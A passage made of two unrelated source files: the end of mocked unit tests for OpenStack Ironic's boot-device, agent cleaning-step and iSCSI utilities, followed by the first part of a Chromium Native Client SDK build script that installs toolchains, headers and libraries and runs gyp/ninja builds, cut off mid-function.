boot_devices.DISK,\n persistent=True)\n node_set_boot_device_mock.assert_called_once_with(\n task, boot_devices.DISK, persistent=True)\n\n @mock.patch.object(utils, \'LOG\', autospec=True)\n @mock.patch.object(manager_utils, \'node_set_boot_device\', autospec=True)\n def test_try_set_boot_device_ipmifailure_uefi(self,\n node_set_boot_device_mock, log_mock):\n self.node.properties = {\'capabilities\': \'boot_mode:uefi\'}\n self.node.save()\n node_set_boot_device_mock.side_effect = exception.IPMIFailure(cmd=\'a\')\n with task_manager.acquire(self.context, self.node.uuid,\n shared=False) as task:\n utils.try_set_boot_device(task, boot_devices.DISK,\n persistent=True)\n node_set_boot_device_mock.assert_called_once_with(\n task, boot_devices.DISK, persistent=True)\n log_mock.warning.assert_called_once_with(mock.ANY)\n\n @mock.patch.object(manager_utils, \'node_set_boot_device\', autospec=True)\n def test_try_set_boot_device_ipmifailure_bios(\n self, node_set_boot_device_mock):\n 
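# Unlike the uefi case above, a bios node is expected to re-raise\n # the IPMIFailure instead of just logging a warning\n 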
node_set_boot_device_mock.side_effect = exception.IPMIFailure(cmd=\'a\')\n with task_manager.acquire(self.context, self.node.uuid,\n shared=False) as task:\n self.assertRaises(exception.IPMIFailure,\n utils.try_set_boot_device,\n task, boot_devices.DISK, persistent=True)\n node_set_boot_device_mock.assert_called_once_with(\n task, boot_devices.DISK, persistent=True)\n\n @mock.patch.object(manager_utils, \'node_set_boot_device\', autospec=True)\n def test_try_set_boot_device_some_other_exception(\n self, node_set_boot_device_mock):\n exc = exception.IloOperationError(operation=""qwe"", error=""error"")\n node_set_boot_device_mock.side_effect = exc\n with task_manager.acquire(self.context, self.node.uuid,\n shared=False) as task:\n self.assertRaises(exception.IloOperationError,\n utils.try_set_boot_device,\n task, boot_devices.DISK, persistent=True)\n node_set_boot_device_mock.assert_called_once_with(\n task, boot_devices.DISK, persistent=True)\n\n\nclass AgentCleaningTestCase(db_base.DbTestCase):\n def setUp(self):\n super(AgentCleaningTestCase, self).setUp()\n mgr_utils.mock_the_extension_manager(driver=\'fake_agent\')\n n = {\'driver\': \'fake_agent\',\n \'driver_internal_info\': {\'agent_url\': \'http://127.0.0.1:9999\'}}\n\n self.node = obj_utils.create_test_node(self.context, **n)\n self.ports = [obj_utils.create_test_port(self.context,\n node_id=self.node.id)]\n\n self.clean_steps = {\n \'hardware_manager_version\': \'1\',\n \'clean_steps\': {\n \'GenericHardwareManager\': [\n {\'interface\': \'deploy\',\n \'step\': \'erase_devices\',\n \'priority\': 20},\n ],\n \'SpecificHardwareManager\': [\n {\'interface\': \'deploy\',\n \'step\': \'update_firmware\',\n \'priority\': 30},\n {\'interface\': \'raid\',\n \'step\': \'create_raid\',\n \'priority\': 10},\n ]\n }\n }\n\n @mock.patch(\'ironic.objects.Port.list_by_node_id\',\n spec_set=types.FunctionType)\n @mock.patch.object(agent_client.AgentClient, \'get_clean_steps\',\n autospec=True)\n def test_get_clean_steps(self, client_mock, list_ports_mock):\n client_mock.return_value = {\n \'command_result\': self.clean_steps}\n list_ports_mock.return_value = self.ports\n\n with task_manager.acquire(\n self.context, self.node[\'uuid\'], shared=False) as task:\n response = utils.agent_get_clean_steps(task)\n client_mock.assert_called_once_with(mock.ANY, task.node,\n self.ports)\n self.assertEqual(\'1\', task.node.driver_internal_info[\n \'hardware_manager_version\'])\n\n # Since steps are returned in dicts, they have non-deterministic\n # ordering\n self.assertEqual(2, len(response))\n self.assertIn(self.clean_steps[\'clean_steps\'][\n \'GenericHardwareManager\'][0], response)\n self.assertIn(self.clean_steps[\'clean_steps\'][\n \'SpecificHardwareManager\'][0], response)\n\n @mock.patch(\'ironic.objects.Port.list_by_node_id\',\n spec_set=types.FunctionType)\n @mock.patch.object(agent_client.AgentClient, \'get_clean_steps\',\n autospec=True)\n def test_get_clean_steps_missing_steps(self, client_mock,\n list_ports_mock):\n del self.clean_steps[\'clean_steps\']\n client_mock.return_value = {\n \'command_result\': self.clean_steps}\n list_ports_mock.return_value = self.ports\n\n with task_manager.acquire(\n self.context, self.node[\'uuid\'], shared=False) as task:\n self.assertRaises(exception.NodeCleaningFailure,\n utils.agent_get_clean_steps,\n task)\n client_mock.assert_called_once_with(mock.ANY, task.node,\n self.ports)\n\n @mock.patch(\'ironic.objects.Port.list_by_node_id\',\n spec_set=types.FunctionType)\n 
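# NOTE: in the two tests below both \'SUCCEEDED\' and \'RUNNING\'\n # command statuses are expected to map to states.CLEANING\n 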
@mock.patch.object(agent_client.AgentClient, \'execute_clean_step\',\n autospec=True)\n def test_execute_clean_step(self, client_mock, list_ports_mock):\n client_mock.return_value = {\n \'command_status\': \'SUCCEEDED\'}\n list_ports_mock.return_value = self.ports\n\n with task_manager.acquire(\n self.context, self.node[\'uuid\'], shared=False) as task:\n response = utils.agent_execute_clean_step(\n task,\n self.clean_steps[\'clean_steps\'][\'GenericHardwareManager\'][0])\n self.assertEqual(states.CLEANING, response)\n\n @mock.patch(\'ironic.objects.Port.list_by_node_id\',\n spec_set=types.FunctionType)\n @mock.patch.object(agent_client.AgentClient, \'execute_clean_step\',\n autospec=True)\n def test_execute_clean_step_running(self, client_mock, list_ports_mock):\n client_mock.return_value = {\n \'command_status\': \'RUNNING\'}\n list_ports_mock.return_value = self.ports\n\n with task_manager.acquire(\n self.context, self.node[\'uuid\'], shared=False) as task:\n response = utils.agent_execute_clean_step(\n task,\n self.clean_steps[\'clean_steps\'][\'GenericHardwareManager\'][0])\n self.assertEqual(states.CLEANING, response)\n\n @mock.patch(\'ironic.objects.Port.list_by_node_id\',\n spec_set=types.FunctionType)\n @mock.patch.object(agent_client.AgentClient, \'execute_clean_step\',\n autospec=True)\n def test_execute_clean_step_version_mismatch(self, client_mock,\n list_ports_mock):\n client_mock.return_value = {\n \'command_status\': \'RUNNING\'}\n list_ports_mock.return_value = self.ports\n\n with task_manager.acquire(\n self.context, self.node[\'uuid\'], shared=False) as task:\n response = utils.agent_execute_clean_step(\n task,\n self.clean_steps[\'clean_steps\'][\'GenericHardwareManager\'][0])\n self.assertEqual(states.CLEANING, response)\n\n\n@mock.patch.object(utils, \'is_block_device\', autospec=True)\n@mock.patch.object(utils, \'login_iscsi\', lambda *_: None)\n@mock.patch.object(utils, \'discovery\', lambda *_: None)\n@mock.patch.object(utils, \'logout_iscsi\', lambda *_: None)\n@mock.patch.object(utils, \'delete_iscsi\', lambda *_: None)\n@mock.patch.object(utils, \'get_dev\', lambda *_: \'/dev/fake\')\nclass ISCSISetupAndHandleErrorsTestCase(tests_base.TestCase):\n\n def test_no_parent_device(self, mock_ibd):\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n mock_ibd.return_value = False\n expected_dev = \'/dev/fake\'\n with testtools.ExpectedException(exception.InstanceDeployFailure):\n with utils._iscsi_setup_and_handle_errors(\n address, port, iqn, lun) as dev:\n self.assertEqual(expected_dev, dev)\n\n mock_ibd.assert_called_once_with(expected_dev)\n\n def test_parent_device_yield(self, mock_ibd):\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n expected_dev = \'/dev/fake\'\n mock_ibd.return_value = True\n with utils._iscsi_setup_and_handle_errors(address, port,\n iqn, lun) as dev:\n self.assertEqual(expected_dev, dev)\n\n mock_ibd.assert_called_once_with(expected_dev)\n', '#!/usr/bin/env python\n# Copyright (c) 2012 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n""""""Entry point for both build and try bots.\n\nThis script is invoked from XXX, usually without arguments\nto package an SDK. 
It automatically determines whether\nthis SDK is for mac, win, or linux.\n\nThe script inspects the following environment variables:\n\nBUILDBOT_BUILDERNAME to determine whether the script is run locally\nand whether it should upload an SDK to file storage (GSTORE)\n""""""\n\n# pylint: disable=W0621\n\n# std python includes\nimport argparse\nimport datetime\nimport glob\nimport os\nimport re\nimport sys\n\nif sys.version_info < (2, 7, 0):\n sys.stderr.write(""python 2.7 or later is required to run this script\\n"")\n sys.exit(1)\n\n# local includes\nimport buildbot_common\nimport build_projects\nimport build_updater\nimport build_version\nimport generate_notice\nimport manifest_util\nimport parse_dsc\nimport verify_filelist\n\nfrom build_paths import SCRIPT_DIR, SDK_SRC_DIR, SRC_DIR, NACL_DIR, OUT_DIR\nfrom build_paths import NACLPORTS_DIR, GSTORE, GONACL_APPENGINE_SRC_DIR\n\n# Add SDK make tools scripts to the python path.\nsys.path.append(os.path.join(SDK_SRC_DIR, \'tools\'))\nsys.path.append(os.path.join(NACL_DIR, \'build\'))\n\nimport getos\nimport oshelpers\n\nBUILD_DIR = os.path.join(NACL_DIR, \'build\')\nNACL_TOOLCHAIN_DIR = os.path.join(NACL_DIR, \'toolchain\')\nNACL_TOOLCHAINTARS_DIR = os.path.join(NACL_TOOLCHAIN_DIR, \'.tars\')\n\nCYGTAR = os.path.join(BUILD_DIR, \'cygtar.py\')\nPKGVER = os.path.join(BUILD_DIR, \'package_version\', \'package_version.py\')\n\nNACLPORTS_URL = \'https://chromium.googlesource.com/external/naclports.git\'\nNACLPORTS_REV = \'PI:KEY\'\n\nGYPBUILD_DIR = \'gypbuild\'\n\noptions = None\n\n# Map of: ToolchainName: (PackageName, SDKDir, arch).\nTOOLCHAIN_PACKAGE_MAP = {\n \'arm_glibc\': (\'nacl_arm_glibc\', \'%(platform)s_arm_glibc\', \'arm\'),\n \'x86_glibc\': (\'nacl_x86_glibc\', \'%(platform)s_x86_glibc\', \'x86\'),\n \'pnacl\': (\'pnacl_newlib\', \'%(platform)s_pnacl\', \'pnacl\')\n }\n\n\ndef GetToolchainDirName(tcname):\n """"""Return the directory name for a given toolchain""""""\n return TOOLCHAIN_PACKAGE_MAP[tcname][1] % {\'platform\': getos.GetPlatform()}\n\n\ndef GetToolchainDir(pepperdir, tcname):\n """"""Return the full path to a given toolchain within a given sdk root""""""\n return os.path.join(pepperdir, \'toolchain\', GetToolchainDirName(tcname))\n\n\ndef GetToolchainLibc(tcname):\n if tcname == \'pnacl\':\n return \'newlib\'\n for libc in (\'glibc\', \'newlib\', \'host\'):\n if libc in tcname:\n return libc\n\n\ndef GetToolchainNaClInclude(pepperdir, tcname, arch=None):\n tcpath = GetToolchainDir(pepperdir, tcname)\n if arch is None:\n arch = TOOLCHAIN_PACKAGE_MAP[tcname][2]\n if arch == \'x86\':\n return os.path.join(tcpath, \'x86_64-nacl\', \'include\')\n elif arch == \'pnacl\':\n return os.path.join(tcpath, \'le32-nacl\', \'include\')\n elif arch == \'arm\':\n return os.path.join(tcpath, \'arm-nacl\', \'include\')\n else:\n buildbot_common.ErrorExit(\'Unknown architecture: %s\' % arch)\n\n\ndef GetConfigDir(arch):\n if arch.endswith(\'x64\') and getos.GetPlatform() == \'win\':\n return \'Release_x64\'\n else:\n return \'Release\'\n\n\ndef GetNinjaOutDir(arch):\n return os.path.join(OUT_DIR, GYPBUILD_DIR + \'-\' + arch, GetConfigDir(arch))\n\n\ndef GetGypBuiltLib(tcname, arch):\n if arch == \'ia32\':\n lib_suffix = \'32\'\n elif arch == \'x64\':\n lib_suffix = \'64\'\n elif arch == \'arm\':\n lib_suffix = \'arm\'\n else:\n lib_suffix = \'\'\n\n tcdir = \'tc_\' + GetToolchainLibc(tcname)\n\n if tcname == \'pnacl\':\n if arch is None:\n lib_suffix = \'\'\n tcdir = \'tc_pnacl_newlib\'\n arch = \'x64\'\n else:\n arch = \'clang-\' + arch\n\n return 
os.path.join(GetNinjaOutDir(arch), \'gen\', tcdir, \'lib\' + lib_suffix)\n\n\ndef GetToolchainNaClLib(tcname, tcpath, arch):\n if arch == \'ia32\':\n return os.path.join(tcpath, \'x86_64-nacl\', \'lib32\')\n elif arch == \'x64\':\n return os.path.join(tcpath, \'x86_64-nacl\', \'lib\')\n elif arch == \'arm\':\n return os.path.join(tcpath, \'arm-nacl\', \'lib\')\n elif tcname == \'pnacl\':\n return os.path.join(tcpath, \'le32-nacl\', \'lib\')\n\n\n\ndef GetOutputToolchainLib(pepperdir, tcname, arch):\n tcpath = os.path.join(pepperdir, \'toolchain\', GetToolchainDirName(tcname))\n return GetToolchainNaClLib(tcname, tcpath, arch)\n\n\ndef GetPNaClTranslatorLib(tcpath, arch):\n if arch not in [\'arm\', \'x86-32\', \'x86-64\']:\n buildbot_common.ErrorExit(\'Unknown architecture %s.\' % arch)\n return os.path.join(tcpath, \'translator\', arch, \'lib\')\n\n\ndef BuildStepDownloadToolchains(toolchains):\n buildbot_common.BuildStep(\'Running package_version.py\')\n args = [sys.executable, PKGVER, \'--mode\', \'nacl_core_sdk\']\n args.extend([\'sync\', \'--extract\'])\n buildbot_common.Run(args, cwd=NACL_DIR)\n\n\ndef BuildStepCleanPepperDirs(pepperdir, pepperdir_old):\n buildbot_common.BuildStep(\'Clean Pepper Dirs\')\n dirs_to_remove = (\n pepperdir,\n pepperdir_old,\n os.path.join(OUT_DIR, \'arm_trusted\')\n )\n for dirname in dirs_to_remove:\n if os.path.exists(dirname):\n buildbot_common.RemoveDir(dirname)\n buildbot_common.MakeDir(pepperdir)\n\n\ndef BuildStepMakePepperDirs(pepperdir, subdirs):\n for subdir in subdirs:\n buildbot_common.MakeDir(os.path.join(pepperdir, subdir))\n\nTEXT_FILES = [\n \'AUTHORS\',\n \'COPYING\',\n \'LICENSE\',\n \'README.Makefiles\',\n \'getting_started/README\',\n]\n\ndef BuildStepCopyTextFiles(pepperdir, pepper_ver, chrome_revision,\n nacl_revision):\n buildbot_common.BuildStep(\'Add Text Files\')\n InstallFiles(SDK_SRC_DIR, pepperdir, TEXT_FILES)\n\n # Replace a few placeholders in README\n readme_text = open(os.path.join(SDK_SRC_DIR, \'README\')).read()\n readme_text = readme_text.replace(\'${VERSION}\', pepper_ver)\n readme_text = readme_text.replace(\'${CHROME_REVISION}\', chrome_revision)\n readme_text = readme_text.replace(\'${CHROME_COMMIT_POSITION}\',\n build_version.ChromeCommitPosition())\n readme_text = readme_text.replace(\'${NACL_REVISION}\', nacl_revision)\n\n # Year/Month/Day Hour:Minute:Second\n time_format = \'%Y/%m/%d %H:%M:%S\'\n readme_text = readme_text.replace(\'${DATE}\',\n datetime.datetime.now().strftime(time_format))\n\n open(os.path.join(pepperdir, \'README\'), \'w\').write(readme_text)\n\n\ndef BuildStepUntarToolchains(pepperdir, toolchains):\n buildbot_common.BuildStep(\'Untar Toolchains\')\n platform = getos.GetPlatform()\n build_platform = \'%s_x86\' % platform\n tmpdir = os.path.join(OUT_DIR, \'tc_temp\')\n buildbot_common.RemoveDir(tmpdir)\n buildbot_common.MakeDir(tmpdir)\n\n # Create a list of extract-package tuples; the first part should be\n # ""$PACKAGE_TARGET/$PACKAGE"". 
The second part should be the destination\n # directory relative to pepperdir/toolchain.\n extract_packages = []\n for toolchain in toolchains:\n toolchain_map = TOOLCHAIN_PACKAGE_MAP.get(toolchain, None)\n if toolchain_map:\n package_name, tcdir, _ = toolchain_map\n package_tuple = (os.path.join(build_platform, package_name),\n tcdir % {\'platform\': platform})\n extract_packages.append(package_tuple)\n\n\n # On linux we also want to extract the arm_trusted package which contains\n # the ARM libraries we ship in support of sel_ldr_arm.\n if platform == \'linux\':\n extract_packages.append((os.path.join(build_platform, \'arm_trusted\'),\n \'arm_trusted\'))\n if extract_packages:\n # Extract all of the packages into the temp directory.\n package_names = [package_tuple[0] for package_tuple in extract_packages]\n buildbot_common.Run([sys.executable, PKGVER,\n \'--packages\', \',\'.join(package_names),\n \'--tar-dir\', NACL_TOOLCHAINTARS_DIR,\n \'--dest-dir\', tmpdir,\n \'extract\'])\n\n # Move all the packages we extracted to the correct destination.\n for package_name, dest_dir in extract_packages:\n full_src_dir = os.path.join(tmpdir, package_name)\n full_dst_dir = os.path.join(pepperdir, \'toolchain\', dest_dir)\n buildbot_common.Move(full_src_dir, full_dst_dir)\n\n # Cleanup the temporary directory we are no longer using.\n buildbot_common.RemoveDir(tmpdir)\n\n\n# List of toolchain headers to install.\n# Source is relative to top of Chromium tree, destination is relative\n# to the toolchain header directory.\nNACL_HEADER_MAP = {\n \'newlib\': [\n (\'native_client/src/include/nacl/nacl_exception.h\', \'nacl/\'),\n (\'native_client/src/include/nacl/nacl_minidump.h\', \'nacl/\'),\n (\'native_client/src/untrusted/irt/irt.h\', \'\'),\n (\'native_client/src/untrusted/irt/irt_dev.h\', \'\'),\n (\'native_client/src/untrusted/irt/irt_extension.h\', \'\'),\n (\'native_client/src/untrusted/nacl/nacl_dyncode.h\', \'nacl/\'),\n (\'native_client/src/untrusted/nacl/nacl_startup.h\', \'nacl/\'),\n (\'native_client/src/untrusted/pthread/pthread.h\', \'\'),\n (\'native_client/src/untrusted/pthread/semaphore.h\', \'\'),\n (\'native_client/src/untrusted/valgrind/dynamic_annotations.h\', \'nacl/\'),\n (\'ppapi/nacl_irt/public/irt_ppapi.h\', \'\'),\n ],\n \'glibc\': [\n (\'native_client/src/include/nacl/nacl_exception.h\', \'nacl/\'),\n (\'native_client/src/include/nacl/nacl_minidump.h\', \'nacl/\'),\n (\'native_client/src/untrusted/irt/irt.h\', \'\'),\n (\'native_client/src/untrusted/irt/irt_dev.h\', \'\'),\n (\'native_client/src/untrusted/irt/irt_extension.h\', \'\'),\n (\'native_client/src/untrusted/nacl/nacl_dyncode.h\', \'nacl/\'),\n (\'native_client/src/untrusted/nacl/nacl_startup.h\', \'nacl/\'),\n (\'native_client/src/untrusted/valgrind/dynamic_annotations.h\', \'nacl/\'),\n (\'ppapi/nacl_irt/public/irt_ppapi.h\', \'\'),\n ],\n}\n\ndef InstallFiles(src_root, dest_root, file_list):\n """"""Copy a set of files from src_root to dest_root according\n to the given mapping. 
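For example, under this mapping\n scheme the pair (\'dir/foo.h\', \'nacl/\') would install dir/foo.h from\n src_root as nacl/foo.h under dest_root. 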
This allows files to be copied\n to a location in the destination tree that is different from the\n location in the source tree.\n\n If the destination mapping ends with a \'/\' then the destination\n basename is inherited from the source file.\n\n Wildcards can be used in the source list but it is not recommended\n as this can end up adding things to the SDK unintentionally.\n """"""\n for file_spec in file_list:\n # The list of files to install can be a simple list of\n # strings or a list of pairs, where each pair corresponds\n # to a mapping from source to destination names.\n if type(file_spec) == str:\n src_file = dest_file = file_spec\n else:\n src_file, dest_file = file_spec\n\n src_file = os.path.join(src_root, src_file)\n\n # Expand source files using glob.\n sources = glob.glob(src_file)\n if not sources:\n sources = [src_file]\n\n if len(sources) > 1 and not dest_file.endswith(\'/\'):\n buildbot_common.ErrorExit(""Target file must end in \'/\' when ""\n ""using globbing to install multiple files"")\n\n for source in sources:\n if dest_file.endswith(\'/\'):\n dest = os.path.join(dest_file, os.path.basename(source))\n else:\n dest = dest_file\n dest = os.path.join(dest_root, dest)\n if not os.path.isdir(os.path.dirname(dest)):\n buildbot_common.MakeDir(os.path.dirname(dest))\n buildbot_common.CopyFile(source, dest)\n\n\ndef InstallNaClHeaders(tc_dst_inc, tcname):\n """"""Copies NaCl headers to expected locations in the toolchain.""""""\n InstallFiles(SRC_DIR, tc_dst_inc, NACL_HEADER_MAP[GetToolchainLibc(tcname)])\n\n\ndef MakeNinjaRelPath(path):\n return os.path.join(os.path.relpath(OUT_DIR, SRC_DIR), path)\n\n\n# TODO(ncbray): stop building and copying libraries into the SDK that are\n# already provided by the toolchain.\n# Mapping from libc to gyp-built trusted libraries\nTOOLCHAIN_LIBS = {\n \'newlib\' : [\n \'libminidump_generator.a\',\n \'libnacl.a\',\n \'libnacl_dyncode.a\',\n \'libnacl_exception.a\',\n \'libnacl_list_mappings.a\',\n \'libnosys.a\',\n \'libppapi.a\',\n \'libppapi_stub.a\',\n \'libpthread.a\',\n ],\n \'glibc\': [\n \'libminidump_generator.a\',\n \'libminidump_generator.so\',\n \'libnacl.a\',\n \'libnacl_dyncode.a\',\n \'libnacl_dyncode.so\',\n \'libnacl_exception.a\',\n \'libnacl_exception.so\',\n \'libnacl_list_mappings.a\',\n \'libnacl_list_mappings.so\',\n \'libppapi.a\',\n \'libppapi.so\',\n \'libppapi_stub.a\',\n ]\n}\n\n\ndef GypNinjaInstall(pepperdir, toolchains):\n tools_files_32 = [\n [\'sel_ldr\', \'sel_ldr_x86_32\'],\n [\'irt_core_newlib_x32.nexe\', \'irt_core_x86_32.nexe\'],\n [\'irt_core_newlib_x64.nexe\', \'irt_core_x86_64.nexe\'],\n ]\n arm_files = [\n [\'elf_loader_newlib_arm.nexe\', \'elf_loader_arm.nexe\'],\n ]\n\n tools_files_64 = []\n\n platform = getos.GetPlatform()\n\n # TODO(binji): dump_syms doesn\'t currently build on Windows. 
See\n # http://crbug.com/245456\n if platform != \'win\':\n tools_files_64 += [\n [\'dump_syms\', \'dump_syms\'],\n [\'minidump_dump\', \'minidump_dump\'],\n [\'minidump_stackwalk\', \'minidump_stackwalk\']\n ]\n\n tools_files_64.append([\'sel_ldr\', \'sel_ldr_x86_64\'])\n tools_files_64.append([\'ncval_new\', \'ncval\'])\n\n if platform == \'linux\':\n tools_files_32.append([\'nacl_helper_bootstrap\',\n \'nacl_helper_bootstrap_x86_32\'])\n tools_files_64.append([\'nacl_helper_bootstrap\',\n \'nacl_helper_bootstrap_x86_64\'])\n tools_files_32.append([\'nonsfi_loader_newlib_x32_nonsfi.nexe\',\n \'nonsfi_loader_x86_32\'])\n\n tools_dir = os.path.join(pepperdir, \'tools\')\n buildbot_common.MakeDir(tools_dir)\n\n # Add .exe extensions to all windows tools\n for pair in tools_files_32 + tools_files_64:\n if platform == \'win\' and not pair[0].endswith(\'.nexe\'):\n pair[0] += \'.exe\'\n pair[1] += \'.exe\'\n\n # Add ARM binaries\n if platform == \'linux\' and not options.no_arm_trusted:\n arm_files += [\n [\'irt_core_newlib_arm.nexe\', \'irt_core_arm.nexe\'],\n [\'nacl_helper_bootstrap\', \'nacl_helper_bootstrap_arm\'],\n [\'nonsfi_loader_newlib_arm_nonsfi.nexe\', \'nonsfi_loader_arm\'],\n [\'sel_ldr\', \'sel_ldr_arm\']\n ]\n\n InstallFiles(GetNinjaOutDir(\'x64\'), tools_dir, tools_files_64)\n InstallFiles(GetNinjaOutDir(\'ia32\'), tools_dir, tools_files_32)\n InstallFiles(GetNinjaOutDir(\'arm\'), tools_dir, arm_files)\n\n for tc in toolchains:\n if tc in (\'host\', \'clang-newlib\'):\n continue\n elif tc == \'pnacl\':\n xarches = (None, \'ia32\', \'x64\', \'arm\')\n elif tc in (\'x86_glibc\', \'x86_newlib\'):\n xarches = (\'ia32\', \'x64\')\n elif tc == \'arm_glibc\':\n xarches = (\'arm\',)\n else:\n raise AssertionError(\'unexpected toolchain value: %s\' % tc)\n\n for xarch in xarches:\n src_dir = GetGypBuiltLib(tc, xarch)\n dst_dir = GetOutputToolchainLib(pepperdir, tc, xarch)\n libc = GetToolchainLibc(tc)\n InstallFiles(src_dir, dst_dir, TOOLCHAIN_LIBS[libc])\n\n\ndef GypNinjaBuild_NaCl(rel_out_dir):\n gyp_py = os.path.join(NACL_DIR, \'build\', \'gyp_nacl\')\n nacl_core_sdk_gyp = os.path.join(NACL_DIR, \'build\', \'nacl_core_sdk.gyp\')\n all_gyp = os.path.join(NACL_DIR, \'build\', \'all.gyp\')\n\n out_dir_32 = MakeNinjaRelPath(rel_out_dir + \'-ia32\')\n out_dir_64 = MakeNinjaRelPath(rel_out_dir + \'-x64\')\n out_dir_arm = MakeNinjaRelPath(rel_out_dir + \'-arm\')\n out_dir_clang_32 = MakeNinjaRelPath(rel_out_dir + \'-clang-ia32\')\n out_dir_clang_64 = MakeNinjaRelPath(rel_out_dir + \'-clang-x64\')\n out_dir_clang_arm = MakeNinjaRelPath(rel_out_dir + \'-clang-arm\')\n\n GypNinjaBuild(\'ia32\', gyp_py, nacl_core_sdk_gyp, \'nacl_core_sdk\', out_dir_32,\n gyp_defines=[\'use_nacl_clang=0\'])\n GypNinjaBuild(\'x64\', gyp_py, nacl_core_sdk_gyp, \'nacl_core_sdk\', out_dir_64,\n gyp_defines=[\'use_nacl_clang=0\'])\n GypNinjaBuild(\'arm\', gyp_py, nacl_core_sdk_gyp, \'nacl_core_sdk\', out_dir_arm,\n gyp_defines=[\'use_nacl_clang=0\'])\n GypNinjaBuild(\'ia32\', gyp_py, nacl_core_sdk_gyp, \'nacl_core_sdk\',\n out_dir_clang_32, gyp_defines=[\'use_nacl_clang=1\'])\n GypNinjaBuild(\'x64\', gyp_py, nacl_core_sdk_gyp, \'nacl_core_sdk\',\n out_dir_clang_64, gyp_defines=[\'use_nacl_clang=1\'])\n GypNinjaBuild(\'arm\', gyp_py, nacl_core_sdk_gyp, \'nacl_core_sdk\',\n out_dir_clang_arm, gyp_defines=[\'use_nacl_clang=1\'])\n GypNinjaBuild(\'x64\', gyp_py, all_gyp, \'ncval_new\', out_dir_64)\n\n\ndef GypNinjaBuild_Breakpad(rel_out_dir):\n # TODO(binji): dump_syms doesn\'t currently build on Windows. 
See\n # http://crbug.com/245456\n if getos.GetPlatform() == \'win\':\n return\n\n gyp_py = os.path.join(SRC_DIR, \'build\', \'gyp_chromium\')\n out_dir = MakeNinjaRelPath(rel_out_dir)\n gyp_file = os.path.join(SRC_DIR, \'breakpad\', \'breakpad.gyp\')\n build_list = [\'dump_syms\', \'minidump_dump\', \'minidump_stackwalk\']\n GypNinjaBuild(\'x64\', gyp_py, gyp_file, build_list, out_dir)\n\n\ndef GypNinjaBuild_PPAPI(arch, rel_out_dir, gyp_defines=None):\n gyp_py = os.path.join(SRC_DIR, \'build\', \'gyp_chromium\')\n out_dir = MakeNinjaRelPath(rel_out_dir)\n gyp_file = os.path.join(SRC_DIR, \'ppapi\', \'native_client\',\n \'native_client.gyp\')\n GypNinjaBuild(arch, gyp_py, gyp_file, \'ppapi_lib\', out_dir,\n gyp_defines=gyp_defines)\n\n\ndef GypNinjaBuild_Pnacl(rel_out_dir, target_arch):\n # TODO(binji): This will build the pnacl_irt_shim twice; once as part of the\n # Chromium build, and once here. When we move more of the SDK build process\n # to gyp, we can remove this.\n gyp_py = os.path.join(SRC_DIR, \'build\', \'gyp_chromium\')\n\n out_dir = MakeNinjaRelPath(rel_out_dir)\n gyp_file = os.path.join(SRC_DIR, \'ppapi\', \'native_client\', \'src\',\n \'untrusted\', \'pnacl_irt_shim\', \'pnacl_irt_shim.gyp\')\n targets = [\'aot\']\n GypNinjaBuild(target_arch, gyp_py, gyp_file, targets, out_dir)\n\n\ndef GypNinjaBuild(arch, gyp_py_script, gyp_file, targets,\n out_dir, gyp_defines=None):\n gyp_env = dict(os.environ)\n gyp_env[\'GYP_GENERATORS\'] = \'ninja\'\n gyp_defines = gyp_defines or []\n gyp_defines.append(\'nacl_allow_thin_archives=0\')\n if not options.no_use_sysroot:\n gyp_defines.append(\'use_sysroot=1\')\n if options.mac_sdk:\n gyp_defines.append(\'mac_sdk=%s\' % options.mac_sdk)\n\n if arch is not None:\n gyp_defines.append(\'target_arch=%s\' % arch)\n if arch == \'arm\':\n gyp_env[\'GYP_CROSSCOMPILE\'] = \'1\'\n if options.no_arm_trusted:\n gyp_defines.append(\'disable_cross_trusted=1\')\n if getos.GetPlatform() == \'mac\':\n gyp_defines.append(\'clang=1\')\n\n gyp_env[\'GYP_DEFINES\'] = \' \'.join(gyp_defines)\n # We can\'t use windows path separators in GYP_GENERATOR_FLAGS since\n # gyp uses shlex to parse them and treats \'\\\' as an escape char.\n gyp_env[\'GYP_GENERATOR_FLAGS\'] = \'output_dir=%s\' % out_dir.replace(\'\\\\\', \'/\')\n\n # Print relevant environment variables\n for key, value in gyp_env.iteritems():\n if key.startswith(\'GYP\') or key in (\'CC\',):\n print \' %s=""%s""\' % (key, value)\n\n buildbot_common.Run(\n [sys.executable, gyp_py_script, gyp_file, \'--depth=.\'],\n cwd=SRC_DIR,\n env=gyp_env)\n\n NinjaBuild(targets, out_dir, arch)\n\n\ndef NinjaBuild(targets, out_dir, arch):\n if type(targets) is not list:\n targets = [targets]\n out_config_dir = os.path.join(out_dir, GetConfigDir(arch))\n buildbot_common.Run([\'ninja\', \'-C\', out_config_dir] + targets, cwd=SRC_DIR)\n\n\ndef BuildStepBuildToolchains(pepperdir, toolchains, build, clean):\n buildbot_common.BuildStep(\'SDK Items\')\n\n if clean:\n for dirname in glob.glob(os.path.join(OUT_DIR, GYPBUILD_DIR + \'*\')):\n buildbot_common.RemoveDir(dirname)\n build = True\n\n if build:\n GypNinjaBuild_NaCl(GYPBUILD_DIR)\n GypNinjaBuild_Breakpad(GYPBUILD_DIR + \'-x64\')\n\n if set(toolchains) & set([\'x86_glibc\', \'x86_newlib\']):\n GypNinjaBuild_PPAPI(\'ia32\', GYPBUILD_DIR + \'-ia32\',\n [\'use_nacl_clang=0\'])\n GypNinjaBuild_PPAPI(\'x64\', GYPBUILD_DIR + \'-x64\',\n [\'use_nacl_clang=0\'])\n\n if \'arm_glibc\' in toolchains:\n GypNinjaBuild_PPAPI(\'arm\', GYPBUILD_DIR + \'-arm\',\n [\'use_nacl_clang=0\'] 
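# non-clang (gcc) PPAPI build; the pnacl branch below repeats\n # these builds with use_nacl_clang=1\n 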
